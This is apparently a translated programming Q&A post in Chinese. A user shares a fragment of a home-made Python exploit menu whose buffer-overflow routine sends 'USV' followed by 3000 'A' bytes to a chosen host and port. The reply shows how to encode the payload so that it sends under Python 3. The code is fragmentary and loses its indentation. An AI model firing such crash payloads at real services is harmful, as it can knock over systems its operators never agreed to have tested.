我最近一直在研究某个人的项目。在尝试导入一个简单的缓冲区溢出漏洞时,我遇到了一个我似乎无法找到解决方案的问题。我在StackOverflow上搜索过,问过LiveOverFlow(嘿。寻找2溢出有关溢出的答案。) 下面是溢出的代码和带错误的2张图片。
import sys
import socket
def cmdline():
sys.stdout.write(RED)
cmdinput = input("NSEFW >> ") #<---- PS1
def ExploitSimpleBufferOverflow():
sys.stdout.write(CYAN2)
host = input("Enter the host IP: ")
port = int(input("Enter the host port: "))
sys.stdout.write(RESET)
for carg in sys.argv:
if carg == "-s":
argnum = sys.argv.index(carg)
argnum += 1
host = sys.argv[argnum]
elif carg == "-p":
argnum = sys.argv.index(carg)
argnum += 1
port = sys.argv[argnum]
buffer = "\x41"* 3000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send("USV" + buffer + "//r//n//r")
s.close
print('Exploit send succesfully.\n', end="")
#Lists all avaible exploits.
elif cmdinput.lower() == "list exploits":
sys.stdout.write(RESET)
print('\n\nto use an exploit, type "use <name>"\n', end="")
print(' \n', end="")
sys.stdout.write(WHITE)
print('\nSimple_Buffer_Overflow (esbo) ', end="")
sys.stdout.write(RED)
print('[M] ', end="")
sys.stdout.write(BLUE)
print('[D]', end="")
print(' \n', end="")
#Callout for SimpleBufferOverflow exploit.
elif cmdinput.lower() == "use exploit_simple_buffer_overflow":
ExploitSimpleBufferOverflow()
elif cmdinput.lower() == "use esbo":
ExploitSimpleBufferOverflow()
答案 0 :(得分:1)
您不仅需要buffer以字节为单位,还需要标题和预告字符串。这应该有效:
s.send(("USV" + buffer + "//r//n//r").encode('utf-8'))